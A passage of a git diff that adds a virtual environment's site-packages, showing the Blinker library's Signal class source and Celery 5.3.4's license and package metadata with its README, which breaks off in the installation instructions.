+ self.receivers: dict[IdentityType, t.Callable | annotatable_weakref] = {} + self.is_muted = False + self._by_receiver: dict[IdentityType, set[IdentityType]] = defaultdict( + self.set_class + ) + self._by_sender: dict[IdentityType, set[IdentityType]] = defaultdict( + self.set_class + ) + self._weak_senders: dict[IdentityType, annotatable_weakref] = {} + + def connect( + self, receiver: T_callable, sender: t.Any = ANY, weak: bool = True + ) -> T_callable: + """Connect *receiver* to signal events sent by *sender*. + + :param receiver: A callable. Will be invoked by :meth:`send` with + `sender=` as a single positional argument and any ``kwargs`` that + were provided to a call to :meth:`send`. + + :param sender: Any object or :obj:`ANY`, defaults to ``ANY``. + Restricts notifications delivered to *receiver* to only those + :meth:`send` emissions sent by *sender*. If ``ANY``, the receiver + will always be notified. A *receiver* may be connected to + multiple *sender* values on the same Signal through multiple calls + to :meth:`connect`. + + :param weak: If true, the Signal will hold a weakref to *receiver* + and automatically disconnect when *receiver* goes out of scope or + is garbage collected. Defaults to True. + + """ + receiver_id = hashable_identity(receiver) + receiver_ref: T_callable | annotatable_weakref + + if weak: + receiver_ref = reference(receiver, self._cleanup_receiver) + receiver_ref.receiver_id = receiver_id + else: + receiver_ref = receiver + sender_id: IdentityType + if sender is ANY: + sender_id = ANY_ID + else: + sender_id = hashable_identity(sender) + + self.receivers.setdefault(receiver_id, receiver_ref) + self._by_sender[sender_id].add(receiver_id) + self._by_receiver[receiver_id].add(sender_id) + del receiver_ref + + if sender is not ANY and sender_id not in self._weak_senders: + # wire together a cleanup for weakref-able senders + try: + sender_ref = reference(sender, self._cleanup_sender) + sender_ref.sender_id = sender_id + except TypeError: + pass + else: + self._weak_senders.setdefault(sender_id, sender_ref) + del sender_ref + + # broadcast this connection. if receivers raise, disconnect. + if "receiver_connected" in self.__dict__ and self.receiver_connected.receivers: + try: + self.receiver_connected.send( + self, receiver=receiver, sender=sender, weak=weak + ) + except TypeError as e: + self.disconnect(receiver, sender) + raise e + if receiver_connected.receivers and self is not receiver_connected: + try: + receiver_connected.send( + self, receiver_arg=receiver, sender_arg=sender, weak_arg=weak + ) + except TypeError as e: + self.disconnect(receiver, sender) + raise e + return receiver + + def connect_via( + self, sender: t.Any, weak: bool = False + ) -> t.Callable[[T_callable], T_callable]: + """Connect the decorated function as a receiver for *sender*. + + :param sender: Any object or :obj:`ANY`. The decorated function + will only receive :meth:`send` emissions sent by *sender*. If + ``ANY``, the receiver will always be notified. A function may be + decorated multiple times with differing *sender* values. + + :param weak: If true, the Signal will hold a weakref to the + decorated function and automatically disconnect when *receiver* + goes out of scope or is garbage collected. Unlike + :meth:`connect`, this defaults to False. + + The decorated function will be invoked by :meth:`send` with + `sender=` as a single positional argument and any ``kwargs`` that + were provided to the call to :meth:`send`. + + + .. 
versionadded:: 1.1 + + """ + + def decorator(fn: T_callable) -> T_callable: + self.connect(fn, sender, weak) + return fn + + return decorator + + @contextmanager + def connected_to( + self, receiver: t.Callable, sender: t.Any = ANY + ) -> t.Generator[None, None, None]: + """Execute a block with the signal temporarily connected to *receiver*. + + :param receiver: a receiver callable + :param sender: optional, a sender to filter on + + This is a context manager for use in the ``with`` statement. It can + be useful in unit tests. *receiver* is connected to the signal for + the duration of the ``with`` block, and will be disconnected + automatically when exiting the block: + + .. code-block:: python + + with on_ready.connected_to(receiver): + # do stuff + on_ready.send(123) + + .. versionadded:: 1.1 + + """ + self.connect(receiver, sender=sender, weak=False) + try: + yield None + finally: + self.disconnect(receiver) + + @contextmanager + def muted(self) -> t.Generator[None, None, None]: + """Context manager for temporarily disabling signal. + Useful for test purposes. + """ + self.is_muted = True + try: + yield None + except Exception as e: + raise e + finally: + self.is_muted = False + + def temporarily_connected_to( + self, receiver: t.Callable, sender: t.Any = ANY + ) -> t.ContextManager[None]: + """An alias for :meth:`connected_to`. + + :param receiver: a receiver callable + :param sender: optional, a sender to filter on + + .. versionadded:: 0.9 + + .. versionchanged:: 1.1 + Renamed to :meth:`connected_to`. ``temporarily_connected_to`` was + deprecated in 1.2 and will be removed in a subsequent version. + + """ + warn( + "temporarily_connected_to is deprecated; use connected_to instead.", + DeprecationWarning, + ) + return self.connected_to(receiver, sender) + + def send( + self, + *sender: t.Any, + _async_wrapper: AsyncWrapperType | None = None, + **kwargs: t.Any, + ) -> list[tuple[t.Callable, t.Any]]: + """Emit this signal on behalf of *sender*, passing on ``kwargs``. + + Returns a list of 2-tuples, pairing receivers with their return + value. The ordering of receiver notification is undefined. + + :param sender: Any object or ``None``. If omitted, synonymous + with ``None``. Only accepts one positional argument. + :param _async_wrapper: A callable that should wrap a coroutine + receiver and run it when called synchronously. + + :param kwargs: Data to be sent to receivers. + """ + if self.is_muted: + return [] + + sender = self._extract_sender(sender) + results = [] + for receiver in self.receivers_for(sender): + if iscoroutinefunction(receiver): + if _async_wrapper is None: + raise RuntimeError("Cannot send to a coroutine function") + receiver = _async_wrapper(receiver) + result = receiver(sender, **kwargs) + results.append((receiver, result)) + return results + + async def send_async( + self, + *sender: t.Any, + _sync_wrapper: SyncWrapperType | None = None, + **kwargs: t.Any, + ) -> list[tuple[t.Callable, t.Any]]: + """Emit this signal on behalf of *sender*, passing on ``kwargs``. + + Returns a list of 2-tuples, pairing receivers with their return + value. The ordering of receiver notification is undefined. + + :param sender: Any object or ``None``. If omitted, synonymous + with ``None``. Only accepts one positional argument. + :param _sync_wrapper: A callable that should wrap a synchronous + receiver and run it when awaited. + + :param kwargs: Data to be sent to receivers. 
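+
+        A rough sketch of a ``_sync_wrapper`` (illustrative only; ``my_signal``
+        and ``sync_wrapper`` are not part of this module) that lets plain
+        callables be awaited alongside coroutine receivers::
+
+            def sync_wrapper(receiver):
+                async def wrapped(sender, **kwargs):
+                    return receiver(sender, **kwargs)
+                return wrapped
+
+            results = await my_signal.send_async("app", _sync_wrapper=sync_wrapper)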
+ """ + if self.is_muted: + return [] + + sender = self._extract_sender(sender) + results = [] + for receiver in self.receivers_for(sender): + if not iscoroutinefunction(receiver): + if _sync_wrapper is None: + raise RuntimeError("Cannot send to a non-coroutine function") + receiver = _sync_wrapper(receiver) + result = await receiver(sender, **kwargs) + results.append((receiver, result)) + return results + + def _extract_sender(self, sender: t.Any) -> t.Any: + if not self.receivers: + # Ensure correct signature even on no-op sends, disable with -O + # for lowest possible cost. + if __debug__ and sender and len(sender) > 1: + raise TypeError( + f"send() accepts only one positional argument, {len(sender)} given" + ) + return [] + + # Using '*sender' rather than 'sender=None' allows 'sender' to be + # used as a keyword argument- i.e. it's an invisible name in the + # function signature. + if len(sender) == 0: + sender = None + elif len(sender) > 1: + raise TypeError( + f"send() accepts only one positional argument, {len(sender)} given" + ) + else: + sender = sender[0] + return sender + + def has_receivers_for(self, sender: t.Any) -> bool: + """True if there is probably a receiver for *sender*. + + Performs an optimistic check only. Does not guarantee that all + weakly referenced receivers are still alive. See + :meth:`receivers_for` for a stronger search. + + """ + if not self.receivers: + return False + if self._by_sender[ANY_ID]: + return True + if sender is ANY: + return False + return hashable_identity(sender) in self._by_sender + + def receivers_for( + self, sender: t.Any + ) -> t.Generator[t.Callable[[t.Any], t.Any], None, None]: + """Iterate all live receivers listening for *sender*.""" + # TODO: test receivers_for(ANY) + if self.receivers: + sender_id = hashable_identity(sender) + if sender_id in self._by_sender: + ids = self._by_sender[ANY_ID] | self._by_sender[sender_id] + else: + ids = self._by_sender[ANY_ID].copy() + for receiver_id in ids: + receiver = self.receivers.get(receiver_id) + if receiver is None: + continue + if isinstance(receiver, WeakTypes): + strong = receiver() + if strong is None: + self._disconnect(receiver_id, ANY_ID) + continue + receiver = strong + yield receiver # type: ignore[misc] + + def disconnect(self, receiver: t.Callable, sender: t.Any = ANY) -> None: + """Disconnect *receiver* from this signal's events. + + :param receiver: a previously :meth:`connected` callable + + :param sender: a specific sender to disconnect from, or :obj:`ANY` + to disconnect from all senders. Defaults to ``ANY``. 
+ + """ + sender_id: IdentityType + if sender is ANY: + sender_id = ANY_ID + else: + sender_id = hashable_identity(sender) + receiver_id = hashable_identity(receiver) + self._disconnect(receiver_id, sender_id) + + if ( + "receiver_disconnected" in self.__dict__ + and self.receiver_disconnected.receivers + ): + self.receiver_disconnected.send(self, receiver=receiver, sender=sender) + + def _disconnect(self, receiver_id: IdentityType, sender_id: IdentityType) -> None: + if sender_id == ANY_ID: + if self._by_receiver.pop(receiver_id, False): + for bucket in self._by_sender.values(): + bucket.discard(receiver_id) + self.receivers.pop(receiver_id, None) + else: + self._by_sender[sender_id].discard(receiver_id) + self._by_receiver[receiver_id].discard(sender_id) + + def _cleanup_receiver(self, receiver_ref: annotatable_weakref) -> None: + """Disconnect a receiver from all senders.""" + self._disconnect(cast(IdentityType, receiver_ref.receiver_id), ANY_ID) + + def _cleanup_sender(self, sender_ref: annotatable_weakref) -> None: + """Disconnect all receivers from a sender.""" + sender_id = cast(IdentityType, sender_ref.sender_id) + assert sender_id != ANY_ID + self._weak_senders.pop(sender_id, None) + for receiver_id in self._by_sender.pop(sender_id, ()): + self._by_receiver[receiver_id].discard(sender_id) + + def _cleanup_bookkeeping(self) -> None: + """Prune unused sender/receiver bookkeeping. Not threadsafe. + + Connecting & disconnecting leave behind a small amount of bookkeeping + for the receiver and sender values. Typical workloads using Blinker, + for example in most web apps, Flask, CLI scripts, etc., are not + adversely affected by this bookkeeping. + + With a long-running Python process performing dynamic signal routing + with high volume- e.g. connecting to function closures, "senders" are + all unique object instances, and doing all of this over and over- you + may see memory usage will grow due to extraneous bookkeeping. (An empty + set() for each stale sender/receiver pair.) + + This method will prune that bookkeeping away, with the caveat that such + pruning is not threadsafe. The risk is that cleanup of a fully + disconnected receiver/sender pair occurs while another thread is + connecting that same pair. If you are in the highly dynamic, unique + receiver/sender situation that has lead you to this method, that + failure mode is perhaps not a big deal for you. + """ + for mapping in (self._by_sender, self._by_receiver): + for _id, bucket in list(mapping.items()): + if not bucket: + mapping.pop(_id, None) + + def _clear_state(self) -> None: + """Throw away all signal state. Useful for unit tests.""" + self._weak_senders.clear() + self.receivers.clear() + self._by_sender.clear() + self._by_receiver.clear() + + +receiver_connected = Signal( + """\ +Sent by a :class:`Signal` after a receiver connects. + +:argument: the Signal that was connected to +:keyword receiver_arg: the connected receiver +:keyword sender_arg: the sender to connect to +:keyword weak_arg: true if the connection to receiver_arg is a weak reference + +.. deprecated:: 1.2 + +As of 1.2, individual signals have their own private +:attr:`~Signal.receiver_connected` and +:attr:`~Signal.receiver_disconnected` signals with a slightly simplified +call signature. This global signal is planned to be removed in 1.6. + +""" +) + + +class NamedSignal(Signal): + """A named generic notification emitter.""" + + def __init__(self, name: str, doc: str | None = None) -> None: + Signal.__init__(self, doc) + + #: The name of this signal. 
+ self.name = name + + def __repr__(self) -> str: + base = Signal.__repr__(self) + return f"{base[:-1]}; {self.name!r}>" # noqa: E702 + + +class Namespace(dict): + """A mapping of signal names to signals.""" + + def signal(self, name: str, doc: str | None = None) -> NamedSignal: + """Return the :class:`NamedSignal` *name*, creating it if required. + + Repeated calls to this function will return the same signal object. + + """ + try: + return self[name] # type: ignore[no-any-return] + except KeyError: + result = self.setdefault(name, NamedSignal(name, doc)) + return result # type: ignore[no-any-return] + + +class WeakNamespace(WeakValueDictionary): + """A weak mapping of signal names to signals. + + Automatically cleans up unused Signals when the last reference goes out + of scope. This namespace implementation exists for a measure of legacy + compatibility with Blinker <= 1.2, and may be dropped in the future. + + .. versionadded:: 1.3 + + """ + + def signal(self, name: str, doc: str | None = None) -> NamedSignal: + """Return the :class:`NamedSignal` *name*, creating it if required. + + Repeated calls to this function will return the same signal object. + + """ + try: + return self[name] # type: ignore[no-any-return] + except KeyError: + result = self.setdefault(name, NamedSignal(name, doc)) + return result # type: ignore[no-any-return] + + +signal = Namespace().signal diff --git a/env/Lib/site-packages/blinker/py.typed b/env/Lib/site-packages/blinker/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/INSTALLER b/env/Lib/site-packages/celery-5.3.4.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/LICENSE b/env/Lib/site-packages/celery-5.3.4.dist-info/LICENSE new file mode 100644 index 00000000..93411068 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/LICENSE @@ -0,0 +1,55 @@ +Copyright (c) 2017-2026 Asif Saif Uddin, core team & contributors. All rights reserved. +Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved. +Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved. +Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved. + +Celery is licensed under The BSD License (3 Clause, also known as +the new BSD license). The license is an OSI approved Open Source +license and is GPL-compatible(1). + +The license text can also be found here: +http://www.opensource.org/licenses/BSD-3-Clause + +License +======= + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of Ask Solem, nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS +BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. + +Documentation License +===================== + +The documentation portion of Celery (the rendered contents of the +"docs" directory of a software distribution or checkout) is supplied +under the "Creative Commons Attribution-ShareAlike 4.0 +International" (CC BY-SA 4.0) License as described by +https://creativecommons.org/licenses/by-sa/4.0/ + +Footnotes +========= +(1) A GPL-compatible license makes it possible to + combine Celery with other software that is released + under the GPL, it does not mean that we're distributing + Celery under the GPL license. The BSD license, unlike the GPL, + let you distribute a modified version without making your + changes open source. diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/METADATA b/env/Lib/site-packages/celery-5.3.4.dist-info/METADATA new file mode 100644 index 00000000..cab80e62 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/METADATA @@ -0,0 +1,655 @@ +Metadata-Version: 2.1 +Name: celery +Version: 5.3.4 +Summary: Distributed Task Queue. 
+Home-page: https://docs.celeryq.dev/ +Author: Ask Solem +Author-email: auvipy@gmail.com +License: BSD-3-Clause +Project-URL: Documentation, https://docs.celeryq.dev/en/stable/ +Project-URL: Changelog, https://docs.celeryq.dev/en/stable/changelog.html +Project-URL: Code, https://github.com/celery/celery +Project-URL: Tracker, https://github.com/celery/celery/issues +Project-URL: Funding, https://opencollective.com/celery +Keywords: task job queue distributed messaging actor +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: BSD License +Classifier: Topic :: System :: Distributed Computing +Classifier: Topic :: Software Development :: Object Brokering +Classifier: Framework :: Celery +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Operating System :: OS Independent +Requires-Python: >=3.8 +License-File: LICENSE +Requires-Dist: billiard (<5.0,>=4.1.0) +Requires-Dist: kombu (<6.0,>=5.3.2) +Requires-Dist: vine (<6.0,>=5.0.0) +Requires-Dist: click (<9.0,>=8.1.2) +Requires-Dist: click-didyoumean (>=0.3.0) +Requires-Dist: click-repl (>=0.2.0) +Requires-Dist: click-plugins (>=1.1.1) +Requires-Dist: tzdata (>=2022.7) +Requires-Dist: python-dateutil (>=2.8.2) +Requires-Dist: importlib-metadata (>=3.6) ; python_version < "3.8" +Requires-Dist: backports.zoneinfo (>=0.2.1) ; python_version < "3.9" +Provides-Extra: arangodb +Requires-Dist: pyArango (>=2.0.2) ; extra == 'arangodb' +Provides-Extra: auth +Requires-Dist: cryptography (==41.0.3) ; extra == 'auth' +Provides-Extra: azureblockblob +Requires-Dist: azure-storage-blob (>=12.15.0) ; extra == 'azureblockblob' +Provides-Extra: brotli +Requires-Dist: brotli (>=1.0.0) ; (platform_python_implementation == "CPython") and extra == 'brotli' +Requires-Dist: brotlipy (>=0.7.0) ; (platform_python_implementation == "PyPy") and extra == 'brotli' +Provides-Extra: cassandra +Requires-Dist: cassandra-driver (<4,>=3.25.0) ; extra == 'cassandra' +Provides-Extra: consul +Requires-Dist: python-consul2 (==0.1.5) ; extra == 'consul' +Provides-Extra: cosmosdbsql +Requires-Dist: pydocumentdb (==2.3.5) ; extra == 'cosmosdbsql' +Provides-Extra: couchbase +Requires-Dist: couchbase (>=3.0.0) ; (platform_python_implementation != "PyPy" and (platform_system != "Windows" or python_version < "3.10")) and extra == 'couchbase' +Provides-Extra: couchdb +Requires-Dist: pycouchdb (==1.14.2) ; extra == 'couchdb' +Provides-Extra: django +Requires-Dist: Django (>=2.2.28) ; extra == 'django' +Provides-Extra: dynamodb +Requires-Dist: boto3 (>=1.26.143) ; extra == 'dynamodb' +Provides-Extra: elasticsearch +Requires-Dist: elasticsearch (<8.0) ; extra == 'elasticsearch' +Provides-Extra: eventlet +Requires-Dist: eventlet (>=0.32.0) ; (python_version < "3.10") and extra == 'eventlet' +Provides-Extra: gevent +Requires-Dist: gevent (>=1.5.0) ; extra == 'gevent' +Provides-Extra: librabbitmq +Requires-Dist: librabbitmq (>=2.0.0) ; (python_version < "3.11") and extra == 'librabbitmq' +Provides-Extra: memcache +Requires-Dist: pylibmc (==1.6.3) ; (platform_system != "Windows") and extra == 'memcache' +Provides-Extra: mongodb 
+Requires-Dist: pymongo[srv] (>=4.0.2) ; extra == 'mongodb' +Provides-Extra: msgpack +Requires-Dist: msgpack (==1.0.5) ; extra == 'msgpack' +Provides-Extra: pymemcache +Requires-Dist: python-memcached (==1.59) ; extra == 'pymemcache' +Provides-Extra: pyro +Requires-Dist: pyro4 (==4.82) ; (python_version < "3.11") and extra == 'pyro' +Provides-Extra: pytest +Requires-Dist: pytest-celery (==0.0.0) ; extra == 'pytest' +Provides-Extra: redis +Requires-Dist: redis (!=4.5.5,<5.0.0,>=4.5.2) ; extra == 'redis' +Provides-Extra: s3 +Requires-Dist: boto3 (>=1.26.143) ; extra == 's3' +Provides-Extra: slmq +Requires-Dist: softlayer-messaging (>=1.0.3) ; extra == 'slmq' +Provides-Extra: solar +Requires-Dist: ephem (==4.1.4) ; (platform_python_implementation != "PyPy") and extra == 'solar' +Provides-Extra: sqlalchemy +Requires-Dist: sqlalchemy (<2.1,>=1.4.48) ; extra == 'sqlalchemy' +Provides-Extra: sqs +Requires-Dist: boto3 (>=1.26.143) ; extra == 'sqs' +Requires-Dist: urllib3 (>=1.26.16) ; extra == 'sqs' +Requires-Dist: kombu[sqs] (>=5.3.0) ; extra == 'sqs' +Requires-Dist: pycurl (>=7.43.0.5) ; (sys_platform != "win32" and platform_python_implementation == "CPython") and extra == 'sqs' +Provides-Extra: tblib +Requires-Dist: tblib (>=1.3.0) ; (python_version < "3.8.0") and extra == 'tblib' +Requires-Dist: tblib (>=1.5.0) ; (python_version >= "3.8.0") and extra == 'tblib' +Provides-Extra: yaml +Requires-Dist: PyYAML (>=3.10) ; extra == 'yaml' +Provides-Extra: zookeeper +Requires-Dist: kazoo (>=1.3.1) ; extra == 'zookeeper' +Provides-Extra: zstd +Requires-Dist: zstandard (==0.21.0) ; extra == 'zstd' + +.. image:: https://docs.celeryq.dev/en/latest/_images/celery-banner-small.png + +|build-status| |coverage| |license| |wheel| |semgrep| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| + +:Version: 5.3.4 (emerald-rush) +:Web: https://docs.celeryq.dev/en/stable/index.html +:Download: https://pypi.org/project/celery/ +:Source: https://github.com/celery/celery/ +:Keywords: task, queue, job, async, rabbitmq, amqp, redis, + python, distributed, actors + +Donations +========= + +This project relies on your generous donations. + +If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. + +.. _`backer`: https://opencollective.com/celery#backer +.. _`sponsor`: https://opencollective.com/celery#sponsor + +For enterprise +============== + +Available as part of the Tidelift Subscription. + +The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ + +What's a Task Queue? +==================== + +Task queues are used as a mechanism to distribute work across threads or +machines. + +A task queue's input is a unit of work, called a task, dedicated worker +processes then constantly monitor the queue for new work to perform. + +Celery communicates via messages, usually using a broker +to mediate between clients and workers. To initiate a task a client puts a +message on the queue, the broker then delivers the message to a worker. + +A Celery system can consist of multiple workers and brokers, giving way +to high availability and horizontal scaling. + +Celery is written in Python, but the protocol can be implemented in any +language. 
In addition to Python there's node-celery_ for Node.js, +a `PHP client`_, `gocelery`_, gopher-celery_ for Go, and rusty-celery_ for Rust. + +Language interoperability can also be achieved by using webhooks +in such a way that the client enqueues an URL to be requested by a worker. + +.. _node-celery: https://github.com/mher/node-celery +.. _`PHP client`: https://github.com/gjedeer/celery-php +.. _`gocelery`: https://github.com/gocelery/gocelery +.. _gopher-celery: https://github.com/marselester/gopher-celery +.. _rusty-celery: https://github.com/rusty-celery/rusty-celery + +What do I need? +=============== + +Celery version 5.3.4 runs on: + +- Python (3.8, 3.9, 3.10, 3.11) +- PyPy3.8+ (v7.3.11+) + + +This is the version of celery which will support Python 3.8 or newer. + +If you're running an older version of Python, you need to be running +an older version of Celery: + +- Python 3.7: Celery 5.2 or earlier. +- Python 3.6: Celery 5.1 or earlier. +- Python 2.7: Celery 4.x series. +- Python 2.6: Celery series 3.1 or earlier. +- Python 2.5: Celery series 3.0 or earlier. +- Python 2.4: Celery series 2.2 or earlier. + +Celery is a project with minimal funding, +so we don't support Microsoft Windows but it should be working. +Please don't open any issues related to that platform. + +*Celery* is usually used with a message broker to send and receive messages. +The RabbitMQ, Redis transports are feature complete, +but there's also experimental support for a myriad of other solutions, including +using SQLite for local development. + +*Celery* can run on a single machine, on multiple machines, or even +across datacenters. + +Get Started +=========== + +If this is the first time you're trying to use Celery, or you're +new to Celery v5.3.4 coming from previous versions then you should read our +getting started tutorials: + +- `First steps with Celery`_ + + Tutorial teaching you the bare minimum needed to get started with Celery. + +- `Next steps`_ + + A more complete overview, showing more features. + +.. _`First steps with Celery`: + https://docs.celeryq.dev/en/stable/getting-started/first-steps-with-celery.html + +.. _`Next steps`: + https://docs.celeryq.dev/en/stable/getting-started/next-steps.html + + You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. + +Celery is... +============= + +- **Simple** + + Celery is easy to use and maintain, and does *not need configuration files*. + + It has an active, friendly community you can talk to for support, + like at our `mailing-list`_, or the IRC channel. + + Here's one of the simplest applications you can make: + + .. code-block:: python + + from celery import Celery + + app = Celery('hello', broker='amqp://guest@localhost//') + + @app.task + def hello(): + return 'hello world' + +- **Highly Available** + + Workers and clients will automatically retry in the event + of connection loss or failure, and some brokers support + HA in way of *Primary/Primary* or *Primary/Replica* replication. + +- **Fast** + + A single Celery process can process millions of tasks a minute, + with sub-millisecond round-trip latency (using RabbitMQ, + py-librabbitmq, and optimized settings). + +- **Flexible** + + Almost every part of *Celery* can be extended or used on its own, + Custom pool implementations, serializers, compression schemes, logging, + schedulers, consumers, producers, broker transports, and much more. + +It supports... 
+================ + + - **Message Transports** + + - RabbitMQ_, Redis_, Amazon SQS + + - **Concurrency** + + - Prefork, Eventlet_, gevent_, single threaded (``solo``) + + - **Result Stores** + + - AMQP, Redis + - memcached + - SQLAlchemy, Django ORM + - Apache Cassandra, IronCache, Elasticsearch + + - **Serialization** + + - *pickle*, *json*, *yaml*, *msgpack*. + - *zlib*, *bzip2* compression. + - Cryptographic message signing. + +.. _`Eventlet`: http://eventlet.net/ +.. _`gevent`: http://gevent.org/ + +.. _RabbitMQ: https://rabbitmq.com +.. _Redis: https://redis.io +.. _SQLAlchemy: http://sqlalchemy.org + +Framework Integration +===================== + +Celery is easy to integrate with web frameworks, some of which even have +integration packages: + + +--------------------+------------------------+ + | `Django`_ | not needed | + +--------------------+------------------------+ + | `Pyramid`_ | `pyramid_celery`_ | + +--------------------+------------------------+ + | `Pylons`_ | `celery-pylons`_ | + +--------------------+------------------------+ + | `Flask`_ | not needed | + +--------------------+------------------------+ + | `web2py`_ | `web2py-celery`_ | + +--------------------+------------------------+ + | `Tornado`_ | `tornado-celery`_ | + +--------------------+------------------------+ + +The integration packages aren't strictly necessary, but they can make +development easier, and sometimes they add important hooks like closing +database connections at ``fork``. + +.. _`Django`: https://djangoproject.com/ +.. _`Pylons`: http://pylonsproject.org/ +.. _`Flask`: https://flask.palletsprojects.com/ +.. _`web2py`: http://web2py.com/ +.. _`Bottle`: https://bottlepy.org/ +.. _`Pyramid`: https://docs.pylonsproject.org/projects/pyramid/en/latest/ +.. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ +.. _`celery-pylons`: https://pypi.org/project/celery-pylons/ +.. _`web2py-celery`: https://code.google.com/p/web2py-celery/ +.. _`Tornado`: https://www.tornadoweb.org/ +.. _`tornado-celery`: https://github.com/mher/tornado-celery/ + +.. _celery-documentation: + +Documentation +============= + +The `latest documentation`_ is hosted at Read The Docs, containing user guides, +tutorials, and an API reference. + +最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 + +.. _`latest documentation`: https://docs.celeryq.dev/en/latest/ + +.. _celery-installation: + +Installation +============ + +You can install Celery either via the Python Package Index (PyPI) +or from source. + +To install using ``pip``: + +:: + + + $ pip install -U Celery + +.. _bundles: + +Bundles +------- + +Celery also defines a group of bundles that can be used +to install Celery and the dependencies for a given feature. + +You can specify these in your requirements or on the ``pip`` +command-line by using brackets. Multiple bundles can be specified by +separating them by commas. + +:: + + + $ pip install "celery[redis]" + + $ pip install "celery[redis,auth,msgpack]" + +The following bundles are available: + +Serializers +~~~~~~~~~~~ + +:``celery[auth]``: + for using the ``auth`` security serializer. + +:``celery[msgpack]``: + for using the msgpack serializer. + +:``celery[yaml]``: + for using the yaml serializer. + +Concurrency +~~~~~~~~~~~ + +:``celery[eventlet]``: + for using the ``eventlet`` pool. + +:``celery[gevent]``: + for using the ``gevent`` pool. + +Transports and Backends +~~~~~~~~~~~~~~~~~~~~~~~ + +:``celery[amqp]``: + for using the RabbitMQ amqp python library. 
+ +:``celery[redis]``: + for using Redis as a message transport or as a result backend. + +:``celery[sqs]``: + for using Amazon SQS as a message transport. + +:``celery[tblib``]: + for using the ``task_remote_tracebacks`` feature. + +:``celery[memcache]``: + for using Memcached as a result backend (using ``pylibmc``) + +:``celery[pymemcache]``: + for using Memcached as a result backend (pure-Python implementation). + +:``celery[cassandra]``: + for using Apache Cassandra/Astra DB as a result backend with the DataStax driver. + +:``celery[azureblockblob]``: + for using Azure Storage as a result backend (using ``azure-storage``) + +:``celery[s3]``: + for using S3 Storage as a result backend. + +:``celery[couchbase]``: + for using Couchbase as a result backend. + +:``celery[arangodb]``: + for using ArangoDB as a result backend. + +:``celery[elasticsearch]``: + for using Elasticsearch as a result backend. + +:``celery[riak]``: + for using Riak as a result backend. + +:``celery[cosmosdbsql]``: + for using Azure Cosmos DB as a result backend (using ``pydocumentdb``) + +:``celery[zookeeper]``: + for using Zookeeper as a message transport. + +:``celery[sqlalchemy]``: + for using SQLAlchemy as a result backend (*supported*). + +:``celery[pyro]``: + for using the Pyro4 message transport (*experimental*). + +:``celery[slmq]``: + for using the SoftLayer Message Queue transport (*experimental*). + +:``celery[consul]``: + for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). + +:``celery[django]``: + specifies the lowest version possible for Django support. + + You should probably not use this in your requirements, it's here + for informational purposes only. + + +.. _celery-installing-from-source: + +Downloading and installing from source +-------------------------------------- + +Download the latest version of Celery from PyPI: + +https://pypi.org/project/celery/ + +You can install it by doing the following: + +:: + + + $ tar xvfz celery-0.0.0.tar.gz + $ cd celery-0.0.0 + $ python setup.py build + # python setup.py install + +The last command must be executed as a privileged user if +you aren't currently using a virtualenv. + +.. _celery-installing-from-git: + +Using the development version +----------------------------- + +With pip +~~~~~~~~ + +The Celery development version also requires the development +versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. + +You can install the latest snapshot of these using the following +pip commands: + +:: + + + $ pip install https://github.com/celery/celery/zipball/main#egg=celery + $ pip install https://github.com/celery/billiard/zipball/main#egg=billiard + $ pip install https://github.com/celery/py-amqp/zipball/main#egg=amqp + $ pip install https://github.com/celery/kombu/zipball/main#egg=kombu + $ pip install https://github.com/celery/vine/zipball/main#egg=vine + +With git +~~~~~~~~ + +Please see the Contributing 